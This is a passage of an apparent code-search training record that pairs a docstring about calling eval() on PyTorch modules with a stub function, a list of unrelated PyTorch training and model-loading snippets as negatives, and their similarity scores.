optimizer.zero_grad()\n\n # forward + backward + optimize\n outputs = model(inputs)\n EMLoss, CMLoss = map_loss(outputs,EM,CM,criterion)\n loss = EMLoss + CMLoss\n loss.backward()\n optimizer.step()\n\n # print statistics\n running_loss += loss.item()\n if i % 2000 == 1999: # print every 2000 mini-batches\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, i + 1, running_loss / 2000))\n running_loss = 0.0\n print('Finished Training')\n return _save_model(model, args.model_dir)", "def test_single_pytorch_module_mapping_to_many_onnx_nodes(self):\n\n AimetLogger.set_level_for_all_areas(logging.DEBUG)\n\n class TwoLayerLstmModel(torch.nn.Module):\n \"\"\"\n Model using torch.nn.LSTM 
module\n \"\"\"\n def __init__(self):\n super(TwoLayerLstmModel, self).__init__()\n self.lstm = torch.nn.LSTM(input_size=3, hidden_size=5, num_layers=3)\n\n def forward(self, x, hx=None):\n return self.lstm(x, hx)\n\n model_name = 'multilayer_lstm'\n model = TwoLayerLstmModel()\n dummy_input = torch.randn(10, 1, 3)\n\n torch.onnx.export(model, dummy_input, './data/' + model_name + '.onnx')\n onnx_utils.OnnxSaver.set_node_names('./data/' + model_name + '.onnx', model, dummy_input, is_conditional=False,\n module_marker_map={})\n onnx_model = onnx.load('./data/' + model_name + '.onnx')\n\n lstm_nodes = [node for node in onnx_model.graph.node if node.op_type == 'LSTM']\n assert 3 == len(lstm_nodes)\n\n node_to_io_dict, _ = onnx_utils.OnnxSaver.get_onnx_node_to_io_tensor_names_map(onnx_model)\n assert isinstance(node_to_io_dict['lstm#root_node'], list)\n assert 3 == len(node_to_io_dict['lstm#root_node'])", "def train(self):\n\t\traise NotImplementedError", "def initialize_model(model_name, num_classes, feature_extract, verbose=False):\n\n model_ft = None\n\n if model_name == \"resnet\":\n \"\"\" Resnet18\n \"\"\"\n model_ft = models.resnet18(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"alexnet\":\n \"\"\" Alexnet\n \"\"\"\n model_ft = models.alexnet(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"vgg\":\n \"\"\" VGG11_bn\n \"\"\"\n model_ft = models.vgg11_bn(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"squeezenet\":\n \"\"\" Squeezenet\n \"\"\"\n with warnings.catch_warnings(): # temporarily suppress warnings about deprecated functions\n warnings.simplefilter(\"ignore\")\n model_ft = models.squeezenet1_0(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1, 1), stride=(1, 1))\n model_ft.num_classes = num_classes\n\n elif model_name == \"densenet\":\n \"\"\" Densenet\n \"\"\"\n model_ft = models.densenet121(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"inception\":\n \"\"\" Inception v3\n Be careful, expects (299,299) sized images and has auxiliary output\n \"\"\"\n model_ft = models.inception_v3(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n # Handle the auxilary net\n num_ftrs = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\n # Handle the primary net\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n\n else: # Unreachable\n exit()\n\n # Gather the parameters to be optimized\n params_to_update = list(filter(lambda p: p.requires_grad, model_ft.parameters()))\n\n # Print model info\n if verbose:\n print()\n print(model_ft)\n print()\n print(\"Params to learn:\")\n for name, param in model_ft.named_parameters():\n if param.requires_grad:\n print('\\t', name)\n\n return model_ft, params_to_update", "def run(self) -> None:\n self.model = self.trainer.train_model(self.model, self.data)", "def 
train(self, mode=True):\n super(CRNN, self).train(mode)\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n if self.freeze_bn:\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n if self.freeze_bn:\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def train(self, mode=True):\n super(RCRNN, self).train(mode)\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n if self.freeze_bn:\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n if self.freeze_bn:\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def on_train_forward(self, runner):\n self.on_iter_forward(runner)", "def on_train_start(self):\n for callback in self.callbacks:\n callback.on_train_start(self, self.get_model())", "def trainModel( self, featureTrain, classTrain):", "def _setup_model(self) -> torch.nn.Sequential:\r\n\r\n # setting up model\r\n ids_ = self.get_hyperparam().get_dim_ids()\r\n if self.get_hyperparam().get_value(ids_[13]):\r\n init_ = lambda mod: self._default_weight_bias_init(mod,\r\n self.get_hyperparam().get_value(ids_[14]),\r\n self.get_hyperparam().get_value(ids_[15]),\r\n self.get_hyperparam().get_value(ids_[16]))\r\n\r\n modules = []\r\n for hd in range(int(self.get_hyperparam().get_value(ids_[3]))+1):\r\n if hd == 0:\r\n act_input_size = self.get_hyperparam().get_value(ids_[0])\r\n output_size = self.get_hyperparam().get_value(ids_[4])[hd]\r\n act_fct = self.get_hyperparam().get_value(ids_[5])[hd]()\r\n elif hd == self.get_hyperparam().get_value(ids_[3]):\r\n act_input_size = self.get_hyperparam().get_value(ids_[4])[hd-1]\r\n output_size = self.get_hyperparam().get_value(ids_[1])\r\n act_fct = self.get_hyperparam().get_value(ids_[6])()\r\n else:\r\n act_input_size = self.get_hyperparam().get_value(ids_[4])[hd-1]\r\n output_size = self.get_hyperparam().get_value(ids_[4])[hd]\r\n act_fct = self.get_hyperparam().get_value(ids_[5])[hd]()\r\n \r\n if self.get_hyperparam().get_value(ids_[13]):\r\n modules.append(init_(torch.nn.Linear(int(act_input_size), int(output_size))))\r\n else:\r\n modules.append(torch.nn.Linear(int(act_input_size), int(output_size)))\r\n modules.append(act_fct)\r\n\r\n model = torch.nn.Sequential(*modules)\r\n \r\n # add process to the model\r\n try:\r\n model = self._add_init(model)\r\n except:\r\n pass \r\n \r\n self._loss_fct = self.get_hyperparam().get_value(ids_[8])()\r\n self._optimizer = self.get_hyperparam().get_value(ids_[7])(model.parameters(), lr=self.get_hyperparam().get_value(ids_[12]))\r\n self._sampling_seed = self.get_hyperparam().get_value(ids_[11])\r\n \r\n return model", "def mode(net: torch.nn.Module, training: bool) -> Iterator[torch.nn.Module]:\n istrain = net.training\n try:\n net.train(training)\n yield net\n finally:\n net.train(istrain)", "def load_networks(self, which_epoch):\n for name in self.model_names:\n if isinstance(name, str):\n filename = '%s_net_%s.pth' % (which_epoch, name)\n path = os.path.join(self.save_dir, filename)\n net = getattr(self, 'net_' + name)\n try:\n state_dict = torch.load(path)\n state_dict = {name.replace('module.', '', 1) : param for name, param in state_dict.items()}\n # net.load_state_dict(torch.load(path))\n net.load_state_dict(state_dict)\n except:\n pretrained_dict = torch.load(path)\n model_dict = net.state_dict()\n try:\n pretrained_dict = {k:v for k,v in 
pretrained_dict.items() if k in model_dict}\n net.load_state_dict(pretrained_dict)\n print('Pretrained network %s has excessive layers; Only loading layers that are used' % name)\n except:\n print('Pretrained network %s has fewer layers; The following are not initialized:' % name)\n not_initialized = set()\n for k, v in pretrained_dict.items():\n if v.size() == model_dict[k].size():\n model_dict[k] = v\n\n for k, v in model_dict.items():\n if k not in pretrained_dict or v.size() != pretrained_dict[k].size():\n not_initialized.add(k.split('.')[0])\n print(sorted(not_initialized))\n net.load_state_dict(model_dict)\n if len(self.gpu_ids) > 0 and torch.cuda.is_available():\n net.cuda()\n if not self.isTrain:\n net.eval()", "def _set_train(self):\n\n if not self.model.__dict__['training']:\n self.model.train()", "def train(self, dataset):\n \"*** YOUR CODE HERE ***\"\n converged = False\n while not converged:\n failures = 0\n for item, classification in dataset.iterate_once(1):\n prediction = self.get_prediction(item)\n if prediction != nn.as_scalar(classification):\n failures += 1\n self.w.update(item, nn.as_scalar(classification))\n if failures == 0:\n converged = True", "def train(self):\n raise NotImplementedError()", "def train(self, batch_training=False):\n raise NotImplementedError", "def train(self, mode=True, freeze_bn=False):\n super(WideResNet, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def train():\n model.train()\n for batch_index, (xb, yb) in enumerate(train_dl):\n loss = loss_func(model(xb), yb)\n\n loss.backward()\n opt.step()\n opt.zero_grad()", "def __init__(self):\n torch.nn.Module.__init__(self)\n # Convolution and pooling layers of VGG-16.\n self.features = torchvision.models.vgg16(pretrained=True).features\n self.features = torch.nn.Sequential(*list(self.features.children())\n [:-1]) # Remove pool5.\n # Linear classifier.\n self.fc = torch.nn.Linear(512**2, 36)", "def train(model, optimizer, criterion, trainloader, architecture, attacker=None, num_epochs=25, freq=10, early_stopping=True):\n for epoch in range(num_epochs):\n running_loss = 0.0\n total, correct, correct_adv, total_adv = 0.0, 0.0, 0.0, 1.0\n early_stop_param = 0.01\n for i, data in enumerate(trainloader):\n inputs, labels = data\n inputs = Variable(\n (inputs.cuda() if use_cuda else inputs), requires_grad=True)\n labels = Variable(\n (labels.cuda() if use_cuda else labels), requires_grad=False)\n\n y_hat = model(inputs)\n loss = criterion(y_hat, labels)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n _, predicted = torch.max(y_hat.data, 1)\n total += labels.size(0)\n correct += predicted.eq(labels.data).sum()\n\n # print statistics\n running_loss = loss.data[0]\n\n if attacker:\n # only perturb inputs on the last epoch, to save time\n # if (i+1) % freq == 0: # and (epoch == num_epochs - 1):\n adv_inputs, adv_labels, num_unperturbed = attacker.attack(\n inputs, labels, model, optimizer)\n correct_adv += num_unperturbed\n total_adv += labels.size(0)\n\n if (i+1) % freq == 0:\n print('[%s: %d, %5d] loss: %.4f' % (architecture, epoch + 1, i + 1, running_loss / 2),\n correct/total, correct_adv/total_adv)\n if early_stopping:\n if running_loss < early_stop_param:\n print(\"Early Stopping !!!!!!!!!!\")\n break\n 
running_loss = 0.0\n\n return correct/total, correct_adv/total_adv", "def train(self, ):\n raise NotImplementedError", "def train(self, dataset):\n \"*** YOUR CODE HERE ***\"\n batch_size = 1\n while True:\n error = False\n for x, y in dataset.iterate_once(batch_size):\n y_pred = self.get_prediction(x)\n y = nn.as_scalar(y)\n if y != y_pred:\n error = True\n nn.Parameter.update(self.get_weights(),x,y)\n if error == False:\n break", "def TrainNetwork(self):\n\n self.logger.info('Train Network')\n self.netWork.TrainGenerator()\n\n # # train NetworkLSTM\n self.logger.info('Train NetworkLSTM')\n self.netWork.TrainLSTM()", "def train(self, samples):\n raise NotImplementedError(\"The training method for the MLE model has not been implemented yet.\")", "def _train_model(self):\n raise NotImplementedError()", "def forward(self, images):\n # pylint: disable=arguments-differ\n # The arguments will differ from the base class since nn.Module is an abstract class.\n\n with torch.no_grad():\n latent = self.resnet(images).squeeze()\n features = self.bn(self.fc(latent))\n return features", "def cuda(self):\n for i in self.modules:\n if torch.cuda.is_available():\n self.modules[i] = self.modules[i].cuda()", "def train(self):\n self.training = True", "def train(self, batch):\n pass", "def train(self, trainset):\n\n if self.epoch == 0:\n input_size = trainset.metadata['input_size']\n n_classes = len(trainset.metadata['targets'])\n self.initialize(input_size, n_classes)\n\n for it in range(self.epoch, self.n_epochs):\n for input, target in trainset:\n self.fprop(input, target)\n self.bprop(input, target)\n self.update()\n self.epoch = self.n_epochs", "def test_from_pytorch_training_classification(self):\n import torch.nn as nn\n import torch.nn.functional as F\n\n class CNN(nn.Module):\n def __init__(self):\n super(CNN, self).__init__()\n self.conv1 = nn.Conv2d(1, 16, kernel_size=5, padding=1)\n self.fc1 = nn.Linear(16 * 13 * 13, 100)\n self.fc2 = nn.Linear(100, 2)\n\n def forward(self, x):\n out = self.conv1(x)\n out = F.relu(out)\n out = F.max_pool2d(out, 2)\n out = out.view(-1, 16 * 13 * 13)\n out = self.fc1(out)\n out = F.relu(out)\n out = self.fc2(out)\n out = F.softmax(out, dim=1)\n return out\n\n model_plaintext = CNN()\n batch_size = 5\n x_orig = get_random_test_tensor(size=(batch_size, 1, 28, 28), is_float=True)\n y_orig = (\n get_random_test_tensor(size=(batch_size, 1), is_float=True).gt(0).long()\n )\n y_one_hot = onehot(y_orig, num_targets=2)\n\n # encrypt training sample:\n x_train = crypten.cryptensor(x_orig, requires_grad=True)\n y_train = crypten.cryptensor(y_one_hot)\n dummy_input = torch.empty((1, 1, 28, 28))\n\n for loss_name in [\"BCELoss\", \"CrossEntropyLoss\"]:\n # create encrypted model\n model = crypten.nn.from_pytorch(model_plaintext, dummy_input)\n model.train()\n model.encrypt()\n\n self._check_training(model, x_train, y_train, loss_name)\n\n self._check_model_export(model, x_train)", "def init_parameters(module: nn.Module):\n for m in module.modules():\n if isinstance(m, nn.Conv2d):\n # todo: check if fan_out is valid\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def set_train(self):\n self.model.train()", "def load_pretrained_model(model_name):\n if model_name==\"AlexNet\":\n print(\"Loading pretrained AlexNet Model\")\n model_ft = models.alexnet(pretrained=True)\n\n for param in model_ft.parameters():# Code for fixing the Conv Layer\n 
param.requires_grad = False\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, 100)\n elif model_name==\"ResNet18\":\n print(\"Loading pretrained ResNet18 Model\")\n model_ft = models.resnet18(pretrained=True)\n\n for param in model_ft.parameters(): # Code for fixing the Conv Layer\n param.requires_grad = False # During Training Conv layer does not learn.\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, 100)\n elif model_name==\"ResNet50\":\n print(\"Loading pretrained ResNet50 Model\")\n\n model_ft = models.resnet50(pretrained=True)\n for param in model_ft.parameters():# Code for fixing the Conv Layer\n param.requires_grad = False\n\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, 100)\n elif model_name==\"DenseNet\":\n print(\"Loading pretrained DenseNet161 Model\")\n model_ft = models.densenet161(pretrained=True)\n\n for param in model_ft.parameters():# Code for fixing the Conv Layer\n param.requires_grad = False\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, 100)\n\n if cfg.load_model_true:\n model_ft.load_state_dict(torch.load(cfg.load_model_path))\n\n return model_ft", "def train(self):\n self.mode = \"train\"\n self.online_net.train()", "def train(self):\n self.mode = \"train\"\n self.online_net.train()", "def test_torch_train_original_layer_multiple(self):\n model = Sequential(\n self.get_digital_layer(in_channels=2, out_channels=2, kernel_size=4, padding=2),\n self.get_digital_layer(in_channels=2, out_channels=3, kernel_size=4, padding=2)\n )\n\n analog_model = Sequential(\n self.get_layer(in_channels=2, out_channels=2, kernel_size=4, padding=2),\n self.get_layer(in_channels=2, out_channels=3, kernel_size=4, padding=2)\n )\n\n for analog_layer, layer in zip(analog_model.children(), model.children()):\n self.set_weights_from_digital_model(analog_layer, layer)\n\n loss_func = mse_loss\n y_b = randn(3, 3, 6, 6, 6)\n x_b = randn(3, 2, 4, 4, 4)\n\n if self.use_cuda:\n y_b = y_b.cuda()\n x_b = x_b.cuda()\n\n self.train_model(model, loss_func, x_b, y_b)\n self.train_model(analog_model, loss_func, x_b, y_b)\n\n for analog_layer, layer in zip(analog_model.children(), model.children()):\n weight, bias = self.get_weights_from_digital_model(analog_layer, layer)\n\n weight_analog, bias_analog = analog_layer.analog_tile.get_weights(realistic=False)\n\n self.assertTensorAlmostEqual(weight_analog, weight)\n if analog_layer.use_bias:\n self.assertTensorAlmostEqual(bias_analog, bias)", "def __init__(self):\n super(SCNN, self).__init__()\n\n # Linear classifier.\n self.inplanes = 128\n self._norm_layer = nn.BatchNorm2d\n self.dilation = 1\n self.groups = 1\n self.base_width = 64\n\n self.num_class = 125\n backbone = torchvision.models.resnet34(pretrained=True)\n self.shared_features = nn.Sequential(*list(backbone.children())[0:6])\n #self.realistic_head = nn.Sequential(*list(backbone.children())[6:8])\n # self.synthetic_head = nn.Sequential(nn.Conv2d(128, 128, 3, 2, 1), nn.BatchNorm2d(128), nn.ReLU(inplace=True),\n # nn.Conv2d(128, 128, 3, 1, 1), nn.BatchNorm2d(128), nn.ReLU(inplace=True),\n # nn.Conv2d(128, 256, 3, 2, 1), nn.BatchNorm2d(256), nn.ReLU(inplace=True),\n # nn.Conv2d(256, 256, 3, 1, 1), nn.BatchNorm2d(256), nn.ReLU(inplace=True))\n\n self.synthetic_head1 = self._make_layer(BasicBlock, 128, 1, stride=2, dilate=False)\n self.synthetic_head2 = self._make_layer(BasicBlock, 256, 1, stride=2, dilate=False)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n 
self.classifier = nn.Linear(256, self.num_class)\n\n for m in self.synthetic_head1.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n for m in self.synthetic_head2.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n weight_init(self.classifier)\n\n for param in self.shared_features.parameters():\n param.requires_grad = False", "def load_networks(self, epoch):\n for name in self.model_names:\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n net = getattr(self, 'net' + name)\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n # if you are using PyTorch newer than 0.4 (e.g., built from\n # GitHub source), you can remove str() on self.device\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))\n net.load_state_dict(state_dict)", "def train(self):\n # For debugging\n torch.autograd.set_detect_anomaly(True)\n # Move variables to device if haven't done so\n self.user_features = self.move_to_cuda(self.user_features, self.device)\n self.item_features = self.move_to_cuda(self.item_features, self.device)\n self.labels = self.move_to_cuda(self.labels, self.device)\n self.model = self.model.to(self.device)\n # Pretrain\n if self.pretrain_bm > 0:\n self.pretrain_bm_net(self.pretrain_bm)\n if self.pretrain_nc > 0:\n self.pretrain_nc_net(self.pretrain_nc)\n # optimizers\n optims = MultipleOptimizer(torch.optim.Adam(self.model.bm_net.parameters(), lr=self.lr),\n torch.optim.Adam(self.model.nc_net.parameters(), lr=self.lr, weight_decay=self.weight_decay))\n # optims = torch.optim.Adam(self.model.parameters(), lr = self.lr)\n\n # criterion = nn.CrossEntropyLoss()\n criterion = F.nll_loss\n best_test_auc = 0.\n best_val_auc = 0.\n best_res = None\n cnt_wait = 0\n patience = 50\n # Training...\n for epoch in range(self.n_epochs):\n self.model.train()\n self.model.zero_grad()\n input_adj = self.adj.clone()\n input_adj = input_adj.to(self.device)\n nc_logits, modified_adj, bm_loss, nc_loss = self.model(input_adj, self.user_features, self.item_features, self.n_epochs, epoch)\n loss = nc_loss + bm_loss * self.alpha\n optims.zero_grad()\n loss.backward()\n # for name, params in self.model.named_parameters():\n # \tif params.requires_grad:\n # \t\tprint(f'{name}: requires grad')\n # \t\tprint(torch.sum(params.grad))\n optims.step()\n # Computation Graph\n # Validation\n self.model.eval()\n with torch.no_grad():\n # input_adj = self.adj.clone()\n # input_adj = input_adj.to(self.device)\n # nc_logits_eval_original, _ = self.model.nc_net(input_adj, self.user_features, self.item_features)\n # input_adj = self.adj.clone()\n # input_adj = input_adj.to(self.device)\n nc_logits_eval_modified, _, _, _ = self.model(input_adj, self.user_features, self.item_features, self.n_epochs, epoch)\n training_res = 
self.eval_node_cls(nc_logits[self.train_nid].detach(), self.labels[self.train_nid], self.n_classes)\n # res = self.eval_node_cls(nc_logits_eval_original[self.val_nid], self.labels[self.val_nid], self.n_classes)\n res_modified = self.eval_node_cls(nc_logits_eval_modified[self.val_nid], self.labels[self.val_nid], self.n_classes)\n if res_modified['auc'] > best_val_auc:\n cnt_wait = 0\n best_val_auc = res_modified['auc']\n # res_test = self.eval_node_cls(nc_logits_eval_original[self.test_nid], self.labels[self.test_nid], self.n_classes)\n res_test_modified = self.eval_node_cls(nc_logits_eval_modified[self.test_nid], self.labels[self.test_nid], self.n_classes)\n if res_test_modified['auc'] > best_test_auc:\n best_test_auc = res_test_modified['auc']\n best_res = res_test_modified\n self.logger.info('Eland Training, Epoch [{}/{}]: loss {:.4f}, train_auc: {:.4f}, val_auc {:.4f}, test_auc {:.4f}, test_ap {:.4f}'\n .format(epoch+1, self.n_epochs, loss.item(), training_res['auc'], res_modified['auc'], res_test_modified['auc'], res_test_modified['ap']))\n else:\n cnt_wait += 1\n self.logger.info('Eland Training, Epoch [{}/{}]: loss {:.4f}, train_auc: {:.4f}, val_auc {:.4f}'\n .format(epoch+1, self.n_epochs, loss.item(), training_res['auc'], res_modified['auc']))\n\n if cnt_wait >= patience:\n self.logger.info('Early stop!')\n break\n self.logger.info('Best Test Results: auc {:.4f}, ap {:.4f}'.format(best_res['auc'], best_res['ap']))\n\n return best_res['auc'], best_res['ap']" ]
[ "0.8094452", "0.72317255", "0.69105303", "0.6737151", "0.6711554", "0.6629512", "0.6621208", "0.6594015", "0.65665567", "0.6528837", "0.64615065", "0.6457623", "0.6428052", "0.641126", "0.64072895", "0.6387566", "0.6358818", "0.634253", "0.63398683", "0.63197255", "0.63110536", "0.6310502", "0.63036263", "0.6300579", "0.6283196", "0.62712526", "0.6257498", "0.6255961", "0.6243613", "0.62399054", "0.62313414", "0.62306345", "0.62142986", "0.62122494", "0.62084174", "0.620247", "0.6163773", "0.61531425", "0.6145708", "0.6124872", "0.6123768", "0.6119132", "0.61173755", "0.61167026", "0.61108863", "0.61097693", "0.610549", "0.61004114", "0.6097006", "0.6085785", "0.60818017", "0.60768247", "0.6073637", "0.6072556", "0.6068468", "0.60585994", "0.60568076", "0.6048771", "0.6042688", "0.6042243", "0.6033289", "0.6017395", "0.6008673", "0.59965074", "0.5996202", "0.59819436", "0.59749734", "0.5974302", "0.59649295", "0.5964085", "0.5959008", "0.59452677", "0.5938158", "0.59355485", "0.59351623", "0.59340745", "0.59309113", "0.59280145", "0.5926845", "0.59251606", "0.59196955", "0.59128034", "0.5900301", "0.5887435", "0.5874292", "0.58655405", "0.58649087", "0.58633524", "0.5861694", "0.5853921", "0.5852329", "0.5852329", "0.58481723", "0.5846498", "0.58451736", "0.5841451" ]
0.6031432
65
Should call Module.eval() on each torch.nn.Module, if present
def eval(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def eval(self) -> None:\n for module in self.modules.values():\n module.eval()\n return", "def to_eval(self):\n for _m in self.modules.values():\n _m.eval()", "def eval(self):\n for name in self.model_names:\n if isinstance(name, str):\n net = getattr(self, 'net' + name)\n net.eval()", "def eval(self):\n for name in self.model_names:\n if isinstance(name, str):\n net = getattr(self, 'net' + name)\n net.eval()", "def eval(self):\n for name in self.model_names:\n if isinstance(name, str):\n net = getattr(self, 'net_' + name)\n net.eval()", "def train(self, mode=True):\n super().train(mode)\n if mode and self.norm_eval:\n for m in self.modules():\n if isinstance(m, _BatchNorm):\n m.eval()", "def train(self) -> None:\n for module in self.modules.values():\n module.train()\n return", "def evaluate_module(\n model: nn.Module,\n dataset: Union[NumpyArrayTuple, torch.utils.data.Dataset],\n loss_fn,\n device: torch.device,\n metrics_map: MetricsMapType = None,\n batch_size: int = 64,\n verbose: bool = True,\n) -> MetricsValType:\n try:\n model = model.to(device)\n\n # if dataset is a tuple of np.ndarrays, convert to torch Dataset\n if isinstance(dataset, tuple):\n X = torch.from_numpy(dataset[0]).type(torch.FloatTensor)\n y = torch.from_numpy(dataset[1]).type(\n torch.LongTensor if dataset[1].dtype in [np.int, np.long] else torch.FloatTensor\n )\n dataset = torch.utils.data.TensorDataset(X, y)\n\n loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=False)\n\n tot_samples, samples, num_batches = len(dataset), 0, 0\n len_tot_samples = len(str(tot_samples))\n\n # create metrics history\n history = MetricsHistory(metrics_map)\n\n with torch.no_grad():\n model.eval()\n for X, y in loader:\n X = X.to(device)\n y = y.to(device)\n\n # forward pass\n preds = model(X)\n # compute batch loss\n batch_loss = loss_fn(preds, y).item()\n history.calculate_batch_metrics(preds.to(\"cpu\"), y.to(\"cpu\"), batch_loss, val_metrics=False)\n samples += len(y)\n num_batches += 1\n if verbose:\n metricsStr = history.get_metrics_str(batch_metrics=True, include_val_metrics=False)\n print(\n \"\\rEvaluating (%*d/%*d) -> %s\"\n % (len_tot_samples, samples, len_tot_samples, tot_samples, metricsStr),\n end=\"\",\n flush=True,\n )\n else:\n # iteration over batch completed\n # calculate average metrics across all batches\n history.calculate_epoch_metrics(val_metrics=False)\n metricsStr = history.get_metrics_str(batch_metrics=False, include_val_metrics=False)\n print(\n \"\\rEvaluating (%*d/%*d) -> %s\"\n % (len_tot_samples, samples, len_tot_samples, tot_samples, metricsStr),\n flush=True,\n )\n return history.get_metric_vals(history.tracked_metrics())\n finally:\n model = model.to(\"cpu\")", "def set_eval(self):\n for m in self.models.values():\n m.eval()", "def evaluate_basin(\n model: nn.Module, loader: DataLoader, normalization_dict: Dict[str, np.ndarray]\n) -> Tuple[np.ndarray, np.ndarray]:\n model.eval()\n\n preds, obs = None, None\n\n with torch.no_grad():\n for data in loader:\n if len(data) == 2:\n x, y = data\n x, y = x.to(DEVICE), y.to(DEVICE)\n p = model(x)[0]\n elif len(data) == 3:\n x_d, x_s, y = data\n x_d, x_s, y = x_d.to(DEVICE), x_s.to(DEVICE), y.to(DEVICE)\n p = model(x_d, x_s[:, 0, :])[0]\n\n if preds is None:\n preds = p.detach().cpu()\n obs = y.detach().cpu()\n else:\n preds = torch.cat((preds, p.detach().cpu()), 0)\n obs = torch.cat((obs, y.detach().cpu()), 0)\n\n preds = rescale_features(\n preds.numpy(), variable=\"target\", normalization_dict=normalization_dict\n )\n obs = 
obs.numpy()\n # set discharges < 0 to zero\n preds[preds < 0] = 0\n\n return preds, obs", "def load_networks(self, epoch: int) -> None:\n for name, module in self.modules.items():\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n if isinstance(module, torch.nn.DataParallel):\n module = module.module\n print('loading the model from %s' % load_path)\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, module, key.split('.'))\n module.load_state_dict(state_dict)\n return", "def train(self, mode=True):\n super().train(mode)\n self._freeze_stages()\n if mode and self.norm_eval:\n for m in self.modules():\n if isinstance(m, _BatchNorm):\n m.eval()", "def eval(self):\n for name in self.network_names:\n if isinstance(name, str):\n net = getattr(self, 'net')\n net.eval()", "def evaluate(model: torch.nn.Module, dummy_input: torch.Tensor):\n model.eval()\n if isinstance(dummy_input, torch.Tensor):\n dummy_input = [dummy_input]\n with torch.no_grad():\n model(*dummy_input)", "def evaluate(model: torch.nn.Module, dummy_input: torch.Tensor):\n if isinstance(dummy_input, torch.Tensor):\n dummy_input = [dummy_input]\n\n model.eval()\n with torch.no_grad():\n model(*dummy_input)", "def train(self, mode=True):\n super(ResNet, self).train(mode)\n self._freeze_stages()\n if mode and self.norm_eval:\n for m in self.modules():\n # trick: eval have effect on BatchNorm only\n if isinstance(m, _BatchNorm):\n m.eval()", "def simulate_modules(self):\n for discrete_mod in list(self.modcells.keys()):\n # print(discrete_mod)\n # print('in simulate_modules, iterating to ', discrete_mod)\n self.simulate_module(discrete_mod)", "def evaluate():\n\tmodel.eval()\n\tstddev = 1 # And mean=0\n\tfor batch_idx, (data, _) in enumerate(syn_test_loader):\n\t\tdata = data.cuda()\n\t\tif batch_idx == 0:\n\t\t\tnoise = torch.autograd.Variable(torch.randn(batch_size, bottleneck).cuda() * stddev)\n\t\t\tsample_representation(\"orig_nat\", data, noise)\n\t\t\tsample_representation(\"natural\", data, noise)\n\t\t\tsample_representation(\"orig_syn\", data, noise)\n\t\t\tsample_representation(\"synth\", data, noise)", "def run_modules():\n pool = Pool()\n if module_inc_opts != ['']:\n runmods = gen_runlist(module_inc_opts, available_mods)\n if not multiprocessing:\n for module in runmods:\n modExec(module)\n else:\n runner = pool.map(modExec, runmods)\n\n elif 